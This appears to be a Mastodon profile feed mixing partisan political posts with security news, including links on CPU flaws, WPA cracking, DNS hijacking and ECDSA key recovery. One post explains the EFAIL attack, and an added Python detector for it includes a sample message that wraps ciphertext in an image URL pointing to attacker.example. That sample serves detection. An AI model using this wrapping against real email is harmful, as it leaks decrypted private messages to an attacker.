Pinned toot

On behalf of the community that has long been saying that is fundamentally incompatible with democracy and a graver national security threat than terrorism, I'd like to say:

We fucking told you so!

influence campaigns

family / culture wars

Your apathy is not an accident.

Make sure to today, everyone in the US 🇺🇸.

Hmm. Swedish kids are taught about on milk cartons, while the prevailing US dogma is that regular people are too stupid to understand security and security products/options have to be dumbed down enough to accommodate this unfixable reality. A self-fulfilling prophecy of dumb.

Stop teaching kids outdated subjects like geography and instead teach computer security and programming in grade school as the essential life skills they are.

twitter.com/angealbertini/stat

krypteia boosted

Life + 70 years is already an overlong copyright term that suppresses creativity. Forcing it on other countries through trade agreements is a big mistake. eff.org/deeplinks/2018/10/new-

pfSense.org uses domain validation certs and doesn't provide pgp signatures for releases...cuz getting a fresh copy of from a naked internet connection after your firewall upgrade fails should be as sketchy a process as possible, apparently.

Thanks for the final impetus to move to for good.

krypteia boosted

Wait, what. introduces its own onion service and it doesn't look terribly bad:
blog.cloudflare.com/cloudflare

Also of note, HTTP Alternative Services now supported by the Tor Browser:
tools.ietf.org/html/rfc7838

krypteia boosted

Credit where credit is due: yesterday Intel released the Firmware Support Package (FSP) for Coffee Lake generation of CPUs on github. After a request to change the license so it is no issue to distribute for coreboot etc they (Vincent Zimmer & Nathan Desimone) did! This is great news!

Repos on Github: github.com/IntelFsp/FSP

Coreboot mailing list thread:
mail.coreboot.org/pipermail/co

I've been a big fan of the U2FZero, an open-source open-hardware U2F usb dongle for those that take "trust no one" seriously.

Anyway, looks like Conor Patrick (developer of the U2FZero) has finalized the design of the new generation key.

Looks like they're releasing it through a kickstarter campaign. I'd definitely wait until you can build and program your own, as the supply chain for these prebuilt devices will be anything but secure.

solokeys.com/

krypteia boosted

The #French can be a bit extreme with their reactions.

OK, a new #vulnerability has been found in #Intel's #CPU but naming a village #NoIntel to express their views is a bit too much. #Foreshadow

Speculative execution claims another scalp. Seems you can get into SGX (and basically read any L1 cache).

foreshadowattack.eu

With a President that leans heavily towards Hitler, he's worried about the guy that leans heavily towards FDR. What a fucking schmuck.

twitter.com/Comey/status/10211

krypteia boosted

RT @hashcat@birdsite.link
We've developed a new attack on WPA/WPA2. There's no more complete 4-way handshake recording required. Here's all details and tools you need: hashcat.net/forum/thread-7717.

twitter.com/hashcat/status/102

If you're feeling like our politics are hopelessly imbecile in the face of grave national threats, remember that Lincoln (a sitting president, during a Civil War) had to go before the Senate and personally testify that Mary Todd Lincoln wasn't a confederate spy.

This too shall pass.

krypteia boosted

Today's BGP hijack of Cloudflare's 1.1.1.1 DNS service to an AS in China demonstrates how using a centralized DNS service is dangerous.

Running a recursive resolver, preferably with DNSSEC validation and enforcement, should help mitigate issues like what happened this morning.

Catching up on news.

, , more , vulnerabilities... Everything is as terrible as I remember.

attack to decrypt and exfiltrate pgp or s/mime encrypted email is pretty hilarious.

Intercept an encrypted email and modify the email to add an HTML image URL directed to your malicious domain. Leave the image tag open (without closed quotes) and paste in the encrypted email and then close the image tag. Most clients will decrypt the text and query the malicious domain looking for an image matching the decrypted text.

This is why we encrypt and authenticate kids.

efail.de
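A mail-filter heuristic for the wrapping described in the post above, as an added example that is not part of the original post or of the EFAIL authors' tooling: it flags an encrypted MIME part that directly follows an HTML part ending inside an unclosed quoted attribute. The sample message, the `attacker.example` domain and all function names are constructed for illustration.

```python
import re
from email import message_from_string

# Constructed sample of the wrapping described above; the ciphertext is a
# placeholder and attacker.example is a reserved example domain.
SAMPLE_WRAPPED = (
    'MIME-Version: 1.0\n'
    'Content-Type: multipart/mixed; boundary="XX"\n\n'
    '--XX\nContent-Type: text/html\n\n'
    '<img src="http://attacker.example/\n'
    '--XX\nContent-Type: application/pkcs7-mime; smime-type=enveloped-data\n\n'
    'PLACEHOLDER-CIPHERTEXT\n'
    '--XX\nContent-Type: text/html\n\n'
    '">\n'
    '--XX--\n'
)

ENCRYPTED_TYPES = {"multipart/encrypted", "application/pkcs7-mime",
                   "application/x-pkcs7-mime"}
QUOTED = re.compile(r'"[^"]*"|\'[^\']*\'')  # a complete quoted attribute value

def has_open_attribute(html):
    """True if the HTML ends inside a quoted attribute of an unclosed tag."""
    if "<" not in html:
        return False
    tail = QUOTED.sub("", html[html.rfind("<"):])  # last tag, closed quotes removed
    quote = re.search(r'["\']', tail)
    return bool(quote) and ">" not in tail[:quote.start()]

def is_encrypted(part):
    """S/MIME or PGP/MIME by content type, inline PGP by its armor header."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    return b"-----BEGIN PGP MESSAGE-----" in (part.get_payload(decode=True) or b"")

def find_wrapped_ciphertext(raw):
    """Indexes of top-level encrypted parts preceded by an open HTML attribute."""
    msg = message_from_string(raw)
    hits, open_attr = [], False
    for i, part in enumerate(msg.get_payload() if msg.is_multipart() else []):
        if is_encrypted(part):
            if open_attr:
                hits.append(i)
            open_attr = False
        elif part.get_content_type() == "text/html":
            html = part.get_payload(decode=True).decode("utf-8", "replace")
            open_attr = has_open_attribute(html)
        else:
            open_attr = False
    return hits
```

This only inspects top-level parts and quoted attributes, so it is a triage signal for a gateway, not a substitute for clients that refuse to merge decrypted and unauthenticated content.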

Apparently declaring to be dead, just because your business model requires it, does not make it so.

Some things are only born posthumously.

krypteia boosted

RT @tqbf@birdsite.link
Presenting Cryptopals Set 8 challenge 6: KEY RECOVERY ON BIASED ECDSA NONCES. toadstyle.org/cryptopals/76f2e

Every DSA signature needs a random nonce, but not every DSA signature truly has one. With even a _bias_ in the nonce, a little linear algebra recovers keys.

twitter.com/tqbf/status/980141
